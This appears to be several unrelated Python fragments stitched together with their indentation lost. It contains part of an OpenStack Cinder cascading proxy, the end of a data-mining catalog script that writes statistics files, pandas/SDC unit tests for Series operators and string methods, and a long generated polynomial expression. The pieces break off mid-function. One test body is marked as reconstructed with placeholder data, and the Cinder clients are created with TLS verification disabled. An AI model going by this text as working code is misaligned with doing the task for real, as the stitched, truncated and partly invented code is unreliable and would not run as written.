"""Manages attachable block storage devices."""
RPC_API_VERSION = '1.18'
target = messaging.Target(version=RPC_API_VERSION)
VOLUME_NAME_MAX_LEN = 255
VOLUME_UUID_MAX_LEN = 36
SNAPSHOT_NAME_MAX_LEN = 255
SNAPSHOT_UUID_MAX_LEN = 36
def __init__(self, service_name=None, *args, **kwargs):
"""Load the specified in args, or flags."""
# update_service_capabilities needs service_name to be volume
super(CinderProxy, self).__init__(service_name='volume',
*args, **kwargs)
self.configuration = Configuration(volume_manager_opts,
config_group=service_name)
self._tp = GreenPool()
self.volume_api = volume.API()
self._last_info_volume_state_heal = 0
self._change_since_time = None
self.volumes_mapping_cache = {'volumes': {}, 'snapshots': {}}
self.image_service = glance.get_default_image_service()
self.adminCinderClient = self._get_cinder_cascaded_admin_client()
self._init_volume_mapping_cache()
def _init_volume_mapping_cache(self):
try:
volumes = \
self._query_vol_cascaded_pagination(change_since_time=None)
for vol in volumes:
ccding_volume_id = self._get_ccding_volume_id(vol)
if ccding_volume_id == '':
continue
self.volumes_mapping_cache['volumes'][ccding_volume_id] = \
vol._info['id']
snapshots = self._query_snapshot_cascaded_all_tenant()
for snapshot in snapshots:
ccding__snapshot_id = self._get_ccding_snapsot_id(snapshot)
if ccding__snapshot_id == '':
continue
self.volumes_mapping_cache['snapshots'][ccding__snapshot_id] = \
snapshot._info['id']
LOG.info(_("cascade info: init volume mapping cache is %s"),
self.volumes_mapping_cache)
except Exception as ex:
LOG.error(_("Failed init volumes mapping cache"))
LOG.exception(ex)
def _get_ccding_volume_id(self, volume):
csd_name = volume._info.get("name", None)
if csd_name is None:
LOG.error(_("Cascade info: csd_name is None!!!. %s"),
volume._info)
return ''
uuid_len = self.VOLUME_UUID_MAX_LEN
if len(csd_name) > (uuid_len+1) and csd_name[-(uuid_len+1)] == '@':
return csd_name[-uuid_len:]
try:
return volume._info['metadata']['logicalVolumeId']
except KeyError:
return ''
def _get_ccding_snapsot_id(self, snapshot):
csd_name = snapshot._info["name"]
uuid_len = self.SNAPSHOT_UUID_MAX_LEN
if len(csd_name) > (uuid_len+1) and csd_name[-(uuid_len+1)] == '@':
return csd_name[-uuid_len:]
try:
return snapshot._info['metadata']['logicalVolumeId']
except KeyError:
return ''
def _gen_ccding_volume_name(self, volume_name, volume_id):
max_len = self.VOLUME_NAME_MAX_LEN - self.VOLUME_UUID_MAX_LEN - 1
if (len(volume_name) <= max_len):
return volume_name + "@" + volume_id
else:
return volume_name[0:max_len] + "@" + volume_id
def _gen_ccding_snapshot_name(self, snapshot_name, snapshot_id):
max_len = self.SNAPSHOT_NAME_MAX_LEN - self.SNAPSHOT_UUID_MAX_LEN - 1
if (len(snapshot_name) <= max_len):
return snapshot_name + "@" + snapshot_id
else:
return snapshot_name[0:max_len] + "@" + snapshot_id
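# Illustrative round trip of the naming scheme above (made-up ids): a cascading
# volume named 'myvol' with id '11111111-2222-3333-4444-555555555555' is
# created in the cascaded cinder as
# 'myvol@11111111-2222-3333-4444-555555555555'; _get_ccding_volume_id() then
# recovers the cascading id from the 36 characters after the trailing '@',
# falling back to the 'logicalVolumeId' metadata key when the name was not
# mangled this way.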
def _get_cinder_cascaded_admin_client(self):
try:
kwargs = {'username': cfg.CONF.cinder_username,
'password': cfg.CONF.cinder_password,
'tenant_id': cfg.CONF.cinder_tenant_id,
'auth_url': cfg.CONF.keystone_auth_url
}
keystoneclient = kc.Client(**kwargs)
cinderclient = cinder_client.Client(
username=cfg.CONF.cinder_username,
auth_url=cfg.CONF.keystone_auth_url,
insecure=True)
cinderclient.client.auth_token = keystoneclient.auth_ref.auth_token
diction = {'project_id': cfg.CONF.cinder_tenant_id}
cinderclient.client.management_url = \
cfg.CONF.cascaded_cinder_url % diction
return cinderclient
except keystone_exception.Unauthorized:
with excutils.save_and_reraise_exception():
LOG.error(_('Token unauthorized failed for keystoneclient '
'constructed when get cascaded admin client'))
except cinder_exception.Unauthorized:
with excutils.save_and_reraise_exception():
LOG.error(_('Token unauthorized failed for cascaded '
'cinderClient constructed'))
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_('Failed to get cinder python client.'))
def _get_cinder_cascaded_user_client(self, context):
try:
ctx_dict = context.to_dict()
cinderclient = cinder_client.Client(
username=ctx_dict.get('user_id'),
auth_url=cfg.CONF.keystone_auth_url,
insecure=True)
cinderclient.client.auth_token = ctx_dict.get('auth_token')
cinderclient.client.management_url = \
cfg.CONF.cascaded_cinder_url % ctx_dict
return cinderclient
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_('Failed to get cinder python client.'))
def _get_image_cascaded(self, context, image_id, cascaded_glance_url):
try:
# direct_url is returned by v2 api
netloc = cfg.CONF.cascading_glance_url
header = 'http://'
if header in cfg.CONF.cascading_glance_url:
netloc = netloc[len(header):]
client = glance.GlanceClientWrapper(
context,
netloc=netloc,
use_ssl=False,
version="2")
image_meta = client.call(context, 'get', image_id)
except Exception:
glance._reraise_translated_image_exception(image_id)
if not self.image_service._is_image_available(context, image_meta):
raise exception.ImageNotFound(image_id=image_id)
LOG.debug(_("cascade ino: image glance get_image_cascaded,"
"cascaded_glance_url:%s"), cascaded_glance_url)
locations = getattr(image_meta, 'locations', None)
LOG.debug(_("cascade ino: image glance get_image_cascaded,"
"locations:%s"), locations)
cascaded_image_id = None
for loc in locations:
image_url = loc.get('url')
LOG.debug(_("cascade ino: image glance get_image_cascaded,"
"image_url:%s"), image_url)
if cascaded_glance_url in image_url:
(cascaded_image_id, glance_netloc, use_ssl) = \
glance._parse_image_ref(image_url)
LOG.debug(_("cascade ino : result :image glance "
"get_image_cascaded,%s") % cascaded_image_id)
break
if cascaded_image_id is None:
raise exception.CinderException(
_("cascade exception: cascaded image for image %s not exist.")
% image_id)
return cascaded_image_id
def _add_to_threadpool(self, func, *args, **kwargs):
self._tp.spawn_n(func, *args, **kwargs)
def init_host(self):
"""Do any initialization that needs to be run if this is a
standalone service.
"""
ctxt = context.get_admin_context()
volumes = self.db.volume_get_all_by_host(ctxt, self.host)
LOG.debug(_("Re-exporting %s volumes"), len(volumes))
LOG.debug(_('Resuming any in progress delete operations'))
for volume in volumes:
if volume['status'] == 'deleting':
LOG.info(_('Resuming delete on volume: %s') % volume['id'])
if CONF.volume_service_inithost_offload:
# Offload all the pending volume delete operations to the
# threadpool to prevent the main volume service thread
| |
ii += 1
# write arch_catal file
arch_catal_file = open(arch_catal, 'w')
ii = 0
while ii < n_rows:
arch_catal_file.write("%.6i %s %.6i %s %.6i %s" % (ii, ' ', mtchx[ii], ' ', mtchy[ii], "\n"))
ii += 1
arch_catal_file.close()
# matrix of statistics
arr_cv = [] # CV array of the Groups and Total
arr_med = [] # means array of the Groups
riga_cv = [] # CV row in arr_cv
arr_col = [] # group temporary array
arr_grsg = [] # input data array (normalized)
arr_grsg_c = [] # copy of arr_grsg (for file out sort)
# input matrix sort in group sequence
ii = 0
ix = 0
while ii < n_rows:
ix += 1
gr1 = str(mtchx[ii])
if mtchx[ii] < 10:
gr1 = '0' + str(mtchx[ii])
sg1 = str(mtchy[ii])
if mtchy[ii] < 10:
sg1 = '0' + str(mtchy[ii])
riga_norm = arr_r[ii]
im = 0
riga_norm1 = []
while im <= m:
riga_norm1.append(str(riga_norm[im]))
im += 1
riga_norm2 = " ".join(riga_norm1)
gr_sg_txt = "G_" + gr1 + "_" + sg1 + " " + str(ix) + " " + riga_norm2
arr_grsg.append(gr_sg_txt)
ii += 1
arr_grsg.sort()
ii = 0
while ii < n_rows:
arr_grsg_c.append(arr_grsg[ii])
ii += 1
# setup of arr_cv matrix
num_gr = 0
gruppo0 = ""
ir = 0
while ir < n_rows:
grsg_key = arr_grsg_c[ir].split()
if not grsg_key[0] == gruppo0:
gruppo0 = grsg_key[0]
num_gr +=1
ic = 1
riga1 = []
riga1.append(grsg_key[0])
while ic <= m + 2: # adding new columns for row mean and n° of records
riga1.append(0.0)
ic += 1
arr_cv.append(riga1) # cv row
ir += 1
riga1 = []
riga1.append("*Means*") # adding new row for cv mean
ic = 1
while ic <= m + 2: # adding new column for row mean and n° of records
riga1.append(0.0)
ic += 1
arr_cv.append(riga1)
def found(x):
ir = 0
while ir < len(arr_cv):
linea_cv = arr_cv[ir]
key_cv = linea_cv[0]
if key_cv == x:
return ir
ir += 1
ir = 0
irx = len(arr_grsg_c)
ic = 3
linea_cv = arr_cv[0]
icx = len(linea_cv)
val_col = []
while ic < icx:
ir = 0
gruppo = ""
val_col = []
while ir < irx:
linea = arr_grsg_c[ir].split()
if linea[0] == gruppo or gruppo == "":
gruppo = linea[0]
val_col.append(float(linea[ic]))
else:
i_gruppo = found(gruppo)
linea_cv = arr_cv[i_gruppo]
media_v = abs(mean(val_col))
if media_v == 0.0:
media_v = 0.0000000001
std_v = sd(val_col)
cv_v = std_v / media_v
linea_cv[ic-2] = cv_v # cv value
linea_cv[len(linea_cv)-1] = len(val_col) # number of records
val_col = []
val_col.append(float(linea[ic]))
gruppo = linea[0]
ir += 1
i_gruppo = found(gruppo)
linea_cv = arr_cv[i_gruppo]
media_v = abs(mean(val_col))
if media_v == 0.0:
media_v = 0.0000000001
std_v = sd(val_col)
cv_v = std_v / media_v
linea_cv[ic-2] = cv_v # cv value
linea_cv[len(linea_cv)-1] = len(val_col) # number of records
ic += 1
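# For each group the loop above stores the coefficient of variation of every
# column, CV = sd / |mean| (with |mean| floored at 0.0000000001 to avoid a
# division by zero), plus the number of records in the last column of the
# arr_cv row; e.g. a column with mean 4.0 and standard deviation 2.0 gets
# CV = 0.5.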
ir = 0
irx = len(arr_cv)
linea_cv = arr_cv[0]
icx = len(linea_cv) - 2
ic = 1
num_rec1 = 0
while ir < irx: # rows mean
media_riga = 0.0
ic = 1
num_col1 = 0
linea_cv = arr_cv[ir]
while ic < icx:
media_riga += float(linea_cv[ic])
num_col1 += 1
ic += 1
linea_cv[icx] = media_riga / num_col1
num_rec1 += linea_cv[icx + 1]
ir += 1
ir = 0
ic = 1
while ic < icx: # weighted mean of columns
media_col = 0.0
ir = 0
num_rec1 = 0
while ir < irx - 1:
linea_cv = arr_cv[ir]
media_col = media_col + linea_cv[ic] * linea_cv[icx+1] # linea_cv[icx+1] = number of records
num_rec1 = num_rec1 + linea_cv[icx+1]
ir += 1
linea_cv = arr_cv[irx - 1]
linea_cv[ic] = media_col / num_rec1
ic += 1
# updating mean of the row
linea_cv = arr_cv[irx - 1]
linea_means = linea_cv[1:icx]
media_riga = mean(linea_means)
linea_cv[icx] = media_riga # Total mean
linea_cv[icx + 1] = num_rec1 # n° of records
cv_media_gen_after = str(media_riga)
cv_media_gen_after = cv_media_gen_after[0:6]
# write cv file
testata_cv = testata
testata_cv[0] = "*Groups*"
testata_cv.append("*Mean*")
testata_cv.append("N_recs")
arch_cv_file = open(arch_cv, 'w')
ic = 0
while ic <= icx + 1:
arch_cv_file.write('%s %s ' % (testata_cv[ic], " "*(9-len(testata_cv[ic]))))
ic += 1
arch_cv_file.write('%s' % ('\n'))
ir = 0
while ir < irx:
ic = 0
linea_cv = arr_cv[ir]
while ic <= icx + 1:
if ic == 0:
arch_cv_file.write('%s %s ' % (linea_cv[0], " "))
else:
if ic <= icx:
arch_cv_file.write('%7.4f %s ' % (linea_cv[ic], " "))
else:
arch_cv_file.write('%6i %s ' % (linea_cv[ic], " "))
ic += 1
arch_cv_file.write('%s' % ("\n"))
ir += 1
ic = 0
media_xcv = mean(xcv[1:icx])
while ic <= icx : # print CV input (before catalogue)
if ic == 0:
arch_cv_file.write('%s %s ' % ("*CVinp*", " "))
else:
if ic < icx:
arch_cv_file.write('%7.4f %s ' % (xcv[ic], " "))
else:
arch_cv_file.write('%7.4f %s ' % (media_xcv, " "))
arch_cv_file.write('%6i %s ' % (linea_cv[ic+1], " "))
ic += 1
arch_cv_file.write('%s' % ("\n"))
#========= lines added by <NAME> 29/02/2012 ======================
#know_index = str(1.0 - float(cv_media_gen_after) / float(str_med_cv_gen))
#know_index = know_index[0:6]
#arch_cv_file.write('%s %s %s' % ('*KIndex* ', know_index, '\n'))
#========= end of lines added by <NAME> 29/02/2012 ==============
arch_cv_file.close()
# writing out catalog file
testata_cat1 = []
testata_cat1.append("*Group*")
arch_output_file = open(arch_output, 'w')
ic= 0
while ic < icx:
testata_cat1.append(testata_cat[ic])
ic += 1
ic= 0
while ic < len(testata_cat1):
arch_output_file.write('%s %s ' % (testata_cat1[ic], " "*(15-len(testata_cat1[ic]))))
ic += 1
arch_output_file.write('%s' % ("\n"))
index = 0
while index < len(arr_orig):
riga_orig = arr_orig[index]
ic = 0
while ic < len(riga_orig):
if not(isinstance(riga_orig[ic],str)):
riga_orig[ic] = str(riga_orig[ic])
ic += 1
# prepend a 0 when gr / sg < 10
gr1 = str(mtchx[index])
if mtchx[index] < 10:
gr1 = '0' + str(mtchx[index])
sg1 = str(mtchy[index])
if mtchy[index] < 10:
sg1 = '0' + str(mtchy[index])
arr_rig0 = "G_" + gr1 + "_" + sg1 + " "*8
arch_output_file.write('%s ' % (arr_rig0))
ic= 0
while ic < len(riga_orig):
arch_output_file.write('%s %s ' % (riga_orig[ic], " "*(15-len(riga_orig[ic]))))
ic += 1
arch_output_file.write('%s' % ("\n"))
index += 1
testata_cat1 = []
testata_cat1.append("*Group*")
testata_cat1.append("*RecNum*")
arch_sort_file = open(arch_sort, 'w')
ic= 0
while ic < icx:
testata_cat1.append(testata_cat[ic])
ic += 1
ic= 0
while ic < len(testata_cat1):
arch_sort_file.write('%s %s ' % (testata_cat1[ic], " "*(15-len(testata_cat1[ic]))))
ic += 1
arch_sort_file.write('%s' % ("\n"))
index = 0
while index < len(arr_grsg_c):
riga_grsg = arr_grsg_c[index].split()
ic = 0
while ic < len(riga_grsg):
val_txt = riga_grsg[ic]
val_txt = val_txt[0:13]
arch_sort_file.write('%s %s ' % (val_txt, " "*(15-len(val_txt))))
ic += 1
if index < len(arr_grsg_c) - 1:
arch_sort_file.write('%s' % ("\n"))
index += 1
arch_sort_file.close()
# writing out catalog and sorted file
arr_outsrt = []
index = 0
while index < len(arr_orig):
riga_sort = []
# prepend a 0 when gr / sg < 10
gr1 = str(mtchx[index])
if mtchx[index] < 10:
gr1 = '0' + str(mtchx[index])
sg1 = str(mtchy[index])
if mtchy[index] < 10:
sg1 = '0' + str(mtchy[index])
riga_sort.append("G_" + gr1 + "_" + sg1)
ic = 0
riga_orig = arr_orig[index]
while ic < len(riga_orig):
val_riga = riga_orig[ic]
riga_sort.append(val_riga)
ic += 1
arr_outsrt.append(riga_sort)
index += 1
for line in arr_outsrt:
line = "".join(line)
arr_outsrt.sort()
testata_srt = []
testata_srt.append("*Group*")
arch_outsrt_file = open(arch_outsrt, 'w')
ic= 0
while ic < icx:
testata_srt.append(testata_orig[ic])
ic += 1
ic= 0
while ic < len(testata_srt):
arch_outsrt_file.write('%s %s' % (testata_srt[ic], " "*(15-len(testata_srt[ic]))))
ic += 1
arch_outsrt_file.write('%s' % ("\n"))
index = 0
key_gruppo = ""
while index < len(arr_outsrt):
riga_sort = arr_outsrt[index]
index_c = 0
while index_c < len(riga_sort):
if index_c == 0:
if riga_sort[0] != key_gruppo:
# arch_outsrt_file.write('%s ' % ("\n"))
key_gruppo = riga_sort[0]
valore = riga_sort[index_c]
arch_outsrt_file.write('%s %s' % (valore, " "*(15-len(valore))))
index_c += 1
if index < len(arr_grsg_c) - 1:
arch_outsrt_file.write('%s' % ("\n"))
index += 1
arch_outsrt_file.close()
print("###############################################################################")
print("# KB_CAT KNOWLEDGE DISCOVERY IN DATA MINING (CATALOG PROGRAM) #")
print("# by <NAME> (COPYRIGHT MARCH 2011 ALL RIGHTS RESERVED) #")
print("# Language used: PYTHON #")
print("###############################################################################")
arch_log_file = open(arch_log, 'w')
arch_log_file.write("%s %s" % ("############################################################################", "\n"))
arch_log_file.write("%s %s" % ("# KB_CAT KNOWLEDGE DISCOVERY IN DATA MINING (CATALOG PROGRAM) #", "\n"))
arch_log_file.write("%s %s" % ("# by <NAME> (COPYRIGHT MARCH 2011 ALL RIGHTS RESERVED) #", "\n"))
arch_log_file.write("%s %s" % ("# Language used: PYTHON . #", "\n"))
arch_log_file.write("%s %s" % ("############################################################################", "\n"))
arch_log_file.write("%s %s %s" % ("Input File -> ", file_input, "\n"))
arch_log_file.write("%s %s %s" % ("Numer of Groups (3 - 20) -> ", str(gruppi_num), "\n"))
arch_log_file.write("%s %s %s" % ("Normalization (Max, Std, None) -> ", tipo_norm, "\n")) | |
= [valid_ids[i] for i in np.random.randint(0, len(valid_ids), n)]
index2 = [valid_ids[i] for i in np.random.randint(0, len(valid_ids), n)]
A = pd.Series(np.random.ranf(n), index=index1)
B = pd.Series(np.random.ranf(n), index=index2)
pd.testing.assert_series_equal(hpat_func(A, B), test_impl(A, B), check_dtype=False, check_names=False)
@skip_sdc_jit
def test_series_operator_add_str_same_index_default(self):
"""Verifies implementation of Series.operator.add between two string Series
with default indexes and same size"""
def test_impl(A, B):
return A + B
hpat_func = self.jit(test_impl)
A = pd.Series(['a', '', 'ae', 'b', 'cccc', 'oo', None])
B = pd.Series(['b', 'aa', '', 'b', 'o', None, 'oo'])
pd.testing.assert_series_equal(hpat_func(A, B), test_impl(A, B), check_dtype=False, check_names=False)
@skip_parallel
@skip_sdc_jit('Arithmetic operations on Series with non-default indexes are not supported in old-style')
def test_series_operator_add_str_align_index_int(self):
"""Verifies implementation of Series.operator.add between two string Series with non-equal integer indexes"""
def test_impl(A, B):
return A + B
hpat_func = self.jit(test_impl)
np.random.seed(0)
index_A = [0, 1, 1, 2, 3, 3, 3, 4, 6, 8, 9]
index_B = [0, 1, 1, 3, 4, 4, 5, 5, 6, 6, 9]
np.random.shuffle(index_A)
np.random.shuffle(index_B)
data = ['', '', 'aa', 'aa', None, 'ae', 'b', 'ccc', 'cccc', None, 'oo']
A = pd.Series(data, index=index_A)
B = pd.Series(data, index=index_B)
pd.testing.assert_series_equal(hpat_func(A, B), test_impl(A, B), check_dtype=False, check_names=False)
def test_series_operator_add_result_name1(self):
"""Verifies name of the Series resulting from appying Series.operator.add to different arguments"""
def test_impl(A, B):
return A + B
hpat_func = self.jit(test_impl)
n = 7
series_names = ['A', '', None, 'B']
for left_name, right_name in combinations(series_names, 2):
S1 = pd.Series(np.arange(n), name=left_name)
S2 = pd.Series(np.arange(n, 0, -1), name=right_name)
with self.subTest(left_series_name=left_name, right_series_name=right_name):
# check_dtype=False because SDC implementation always returns float64 Series
pd.testing.assert_series_equal(hpat_func(S1, S2), test_impl(S1, S2), check_dtype=False)
# also verify the case when the second operand is a scalar
scalar = 3.0
S1 = pd.Series(np.arange(n), name='A')
pd.testing.assert_series_equal(hpat_func(S1, scalar), test_impl(S1, scalar), check_dtype=False)
@unittest.expectedFailure
def test_series_operator_add_result_name2(self):
"""Verifies implementation of Series.operator.add differs from Pandas
in returning unnamed Series when both operands are named Series with the same name"""
def test_impl(A, B):
return A + B
hpat_func = self.jit(test_impl)
n = 7
S1 = pd.Series(np.arange(n), name='A')
S2 = pd.Series(np.arange(n, 0, -1), name='A')
result = hpat_func(S1, S2)
result_ref = test_impl(S1, S2)
# check_dtype=False because SDC implementation always returns float64 Series
pd.testing.assert_series_equal(result, result_ref, check_dtype=False)
@unittest.expectedFailure
def test_series_operator_add_series_dtype_promotion(self):
"""Verifies implementation of Series.operator.add differs from Pandas
in dtype of resulting Series that is fixed to float64"""
def test_impl(A, B):
return A + B
hpat_func = self.jit(test_impl)
n = 7
dtypes_to_test = (np.int32, np.int64, np.float32, np.float64)
for dtype_left, dtype_right in combinations(dtypes_to_test, 2):
with self.subTest(left_series_dtype=dtype_left, right_series_dtype=dtype_right):
A = pd.Series(np.array(np.arange(n), dtype=dtype_left))
B = pd.Series(np.array(np.arange(n)**2, dtype=dtype_right))
pd.testing.assert_series_equal(hpat_func(A, B), test_impl(A, B))
@skip_sdc_jit('Old-style implementation of operators doesn\'t support Series indexes')
def test_series_operator_lt_index_mismatch1(self):
"""Verifies correct exception is raised when comparing Series with non equal integer indexes"""
def test_impl(A, B):
return A < B
hpat_func = self.jit(test_impl)
n = 11
np.random.seed(0)
index1 = np.arange(n)
index2 = np.copy(index1)
np.random.shuffle(index2)
A = pd.Series([1, 2, -1, 3, 4, 2, -3, 5, 6, 6, 0], index=index1)
B = pd.Series([3, 2, -2, 1, 4, 1, -5, 6, 6, 3, -1], index=index2)
with self.assertRaises(Exception) as context:
test_impl(A, B)
exception_ref = context.exception
self.assertRaises(type(exception_ref), hpat_func, A, B)
@skip_sdc_jit('Old-style implementation of operators doesn\'t support comparing Series of different lengths')
def test_series_operator_lt_index_mismatch2(self):
"""Verifies correct exception is raised when comparing Series of different size with default indexes"""
def test_impl(A, B):
return A < B
hpat_func = self.jit(test_impl)
A = pd.Series([1, 2, -1, 3, 4, 2])
B = pd.Series([3, 2, -2, 1, 4, 1, -5, 6, 6, 3, -1])
with self.assertRaises(Exception) as context:
test_impl(A, B)
exception_ref = context.exception
self.assertRaises(type(exception_ref), hpat_func, A, B)
@skip_numba_jit('Numba propagates different exception:\n'
'numba.errors.TypingError: Failed in nopython mode pipeline (step: nopython frontend)\n'
'Internal error at <numba.typeinfer.IntrinsicCallConstraint ...\n'
'\'Signature\' object is not iterable')
@skip_sdc_jit('Typing checks not implemented for Series operators in old-style')
def test_series_operator_lt_index_mismatch3(self):
"""Verifies correct exception is raised when comparing two Series with non-comparable indexes"""
def test_impl(A, B):
return A < B
hpat_func = self.jit(test_impl)
S1 = pd.Series([1, 2, -1, 3, 4, 2])
S2 = pd.Series(['a', 'b', '', None, '2', 'ccc'])
with self.assertRaises(TypingError) as raises:
hpat_func(S1, S2)
msg = 'Operator lt(). Not supported for series with not-comparable indexes.'
self.assertIn(msg, str(raises.exception))
@skip_sdc_jit('Comparison operations on Series with non-default indexes are not supported in old-style')
@skip_numba_jit("TODO: find out why pandas aligning series indexes produces Int64Index when common dtype is float\n"
"AssertionError: Series.index are different\n"
"Series.index classes are not equivalent\n"
"[left]: Float64Index([0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0], dtype='float64')\n"
"[right]: Int64Index([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], dtype='int64')\n")
def test_series_operator_lt_index_dtype_promotion(self):
"""Verifies implementation of Series.operator.lt between two numeric Series
with the same numeric indexes of different dtypes"""
def test_impl(A, B):
return A < B
hpat_func = self.jit(test_impl)
n = 7
index_dtypes_to_test = (np.int32, np.int64, np.float32, np.float64)
for dtype_left, dtype_right in combinations(index_dtypes_to_test, 2):
with self.subTest(left_series_dtype=dtype_left, right_series_dtype=dtype_right):
A = pd.Series(np.arange(n), index=np.arange(n, dtype=dtype_left))
B = pd.Series(np.arange(n)**2, index=np.arange(n, dtype=dtype_right))
pd.testing.assert_series_equal(hpat_func(A, B), test_impl(A, B))
@skip_sdc_jit('Comparison operations on Series with non-default indexes are not supported in old-style')
def test_series_operator_lt_index_dtype_promotion_fixme(self):
""" Same as test_series_operator_lt_index_dtype_promotion but with w/a for the problem.
Can be deleted when the latter is fixed """
def test_impl(A, B):
return A < B
hpat_func = self.jit(test_impl)
n = 7
index_dtypes_to_test = (np.int32, np.int64, np.float32, np.float64)
for dtype_left, dtype_right in combinations(index_dtypes_to_test, 2):
# FIXME: skip the sub-test if one of the dtypes is float and the other is integer
if not (np.issubdtype(dtype_left, np.integer) and np.issubdtype(dtype_right, np.integer)
or np.issubdtype(dtype_left, np.float) and np.issubdtype(dtype_right, np.float)):
continue
with self.subTest(left_series_dtype=dtype_left, right_series_dtype=dtype_right):
A = pd.Series(np.arange(n), index=np.arange(n, dtype=dtype_left))
B = pd.Series(np.arange(n)**2, index=np.arange(n, dtype=dtype_right))
pd.testing.assert_series_equal(hpat_func(A, B), test_impl(A, B))
@skip_numba_jit('Numba propagates different exception:\n'
'numba.errors.TypingError: Failed in nopython mode pipeline (step: nopython frontend)\n'
'Internal error at <numba.typeinfer.IntrinsicCallConstraint ...\n'
'\'Signature\' object is not iterable')
@skip_sdc_jit('Typing checks not implemented for Series operators in old-style')
def test_series_operator_lt_unsupported_dtypes(self):
"""Verifies correct exception is raised when comparing two Series with non-comparable dtypes"""
def test_impl(A, B):
return A < B
hpat_func = self.jit(test_impl)
S1 = pd.Series([1, 2, -1, 3, 4, 2])
S2 = pd.Series(['a', 'b', '', None, '2', 'ccc'])
with self.assertRaises(TypingError) as raises:
hpat_func(S1, S2)
msg = 'Operator lt(). Not supported for series with not-comparable data.'
self.assertIn(msg, str(raises.exception))
@skip_sdc_jit
def test_series_operator_lt_str(self):
"""Verifies implementation of Series.operator.lt between two string Series with default indexes"""
def test_impl(A, B):
return A < B
hpat_func = self.jit(test_impl)
A = pd.Series(['a', '', 'ae', 'b', 'cccc', 'oo', None])
B = pd.Series(['b', 'aa', '', 'b', 'o', None, 'oo'])
pd.testing.assert_series_equal(hpat_func(A, B), test_impl(A, B))
@skip_sdc_jit("Series.str.istitle is not supported yet")
def test_series_istitle_str(self):
series = pd.Series(['Cat', 'dog', 'Bird'])
cfunc = self.jit(istitle_usecase)
pd.testing.assert_series_equal(cfunc(series), istitle_usecase(series))
@skip_sdc_jit("Series.str.istitle is not supported yet")
@skip_numba_jit("Not work with None and np.nan")
def test_series_istitle_str_fixme(self):
series = pd.Series(['Cat', 'dog', 'Bird', None, np.nan])
cfunc = self.jit(istitle_usecase)
pd.testing.assert_series_equal(cfunc(series), istitle_usecase(series))
@skip_sdc_jit("Series.str.isspace is not supported yet")
def test_series_isspace_str(self):
series = [['', ' ', ' ', ' '],
['', ' c ', ' b ', ' a '],
['aaaaaa', 'bb', 'c', ' d']
]
cfunc = self.jit(isspace_usecase)
for ser in series:
S = pd.Series(ser)
pd.testing.assert_series_equal(cfunc(S), isspace_usecase(S))
@skip_sdc_jit("Series.str.isalpha is not supported yet")
def test_series_isalpha_str(self):
series = [['leopard', 'Golden Eagle', 'SNAKE', ''],
['Hello world!', 'hello 123', 'mynameisPeter'],
['one', 'one1', '1', '']
]
cfunc = self.jit(isalpha_usecase)
for ser in series:
S = pd.Series(ser)
pd.testing.assert_series_equal(cfunc(S), isalpha_usecase(S))
@skip_sdc_jit("Series.str.islower is not supported yet")
def test_series_islower_str(self):
series = [['leopard', 'Golden Eagle', 'SNAKE', ''],
['Hello world!', 'hello 123', 'mynameisPeter']
]
cfunc = self.jit(islower_usecase)
for ser in series:
S = pd.Series(ser)
pd.testing.assert_series_equal(cfunc(S), islower_usecase(S))
def test_series_lower_str(self):
all_data = [['leopard', None, 'Golden Eagle', np.nan, 'SNAKE', ''],
['Hello world!', np.nan, 'hello 123', None, 'mynameisPeter']
]
cfunc = self.jit(lower_usecase)
for data in all_data:
s = pd.Series(data)
pd.testing.assert_series_equal(cfunc(s), lower_usecase(s))
def test_series_strip_str(self):
s = pd.Series(['1. Ant. ', None, '2. Bee!\n', np.nan, '3. Cat?\t'])
cfunc = self.jit(strip_usecase)
for to_strip in [None, '123.', '.!? \n\t', '123.!? \n\t']:
pd.testing.assert_series_equal(cfunc(s, to_strip), strip_usecase(s, to_strip))
def test_series_lstrip_str(self):
s = pd.Series(['1. Ant. ', None, '2. Bee!\n', np.nan, '3. Cat?\t'])
cfunc = self.jit(lstrip_usecase)
for to_strip in [None, '123.', '.!? \n\t', '123.!? \n\t']:
pd.testing.assert_series_equal(cfunc(s, to_strip), lstrip_usecase(s, to_strip))
def test_series_rstrip_str(self):
s = pd.Series(['1. Ant. ', None, '2. Bee!\n', np.nan, '3. Cat?\t'])
cfunc = self.jit(rstrip_usecase)
for to_strip in [None, '123.', '.!? \n\t', '123.!? \n\t']:
pd.testing.assert_series_equal(cfunc(s, to_strip), rstrip_usecase(s, to_strip))
@skip_sdc_jit("Series.str.isalnum is not supported yet")
    def test_series_isalnum_str(self):
        # NOTE: the body of this test was lost in extraction; it is reconstructed
        # here to follow the pattern of the neighbouring is* tests, so the concrete
        # sample strings are placeholders rather than the original data.
        series = [['leopard', 'Golden Eagle', 'SNAKE', ''],
                  ['one', 'one1', '1', '']
                  ]
        cfunc = self.jit(isalnum_usecase)
        for ser in series:
            S = pd.Series(ser)
            pd.testing.assert_series_equal(cfunc(S), isalnum_usecase(S))
+ 1892 * uk_26
+ 4085 * uk_27
+ 9331 * uk_28
+ 688 * uk_29
+ 43 * uk_3
+ 256 * uk_30
+ 704 * uk_31
+ 1520 * uk_32
+ 3472 * uk_33
+ 256 * uk_34
+ 1936 * uk_35
+ 4180 * uk_36
+ 9548 * uk_37
+ 704 * uk_38
+ 9025 * uk_39
+ 16 * uk_4
+ 20615 * uk_40
+ 1520 * uk_41
+ 47089 * uk_42
+ 3472 * uk_43
+ 256 * uk_44
+ 106179944855977 * uk_45
+ 141265316367 * uk_46
+ 96419184187 * uk_47
+ 35876905744 * uk_48
+ 98661490796 * uk_49
+ 44 * uk_5
+ 213019127855 * uk_50
+ 486580534153 * uk_51
+ 35876905744 * uk_52
+ 187944057 * uk_53
+ 128279277 * uk_54
+ 47731824 * uk_55
+ 131262516 * uk_56
+ 283407705 * uk_57
+ 647362863 * uk_58
+ 47731824 * uk_59
+ 95 * uk_6
+ 87555697 * uk_60
+ 32578864 * uk_61
+ 89591876 * uk_62
+ 193437005 * uk_63
+ 441850843 * uk_64
+ 32578864 * uk_65
+ 12122368 * uk_66
+ 33336512 * uk_67
+ 71976560 * uk_68
+ 164409616 * uk_69
+ 217 * uk_7
+ 12122368 * uk_70
+ 91675408 * uk_71
+ 197935540 * uk_72
+ 452126444 * uk_73
+ 33336512 * uk_74
+ 427360825 * uk_75
+ 976182095 * uk_76
+ 71976560 * uk_77
+ 2229805417 * uk_78
+ 164409616 * uk_79
+ 16 * uk_8
+ 12122368 * uk_80
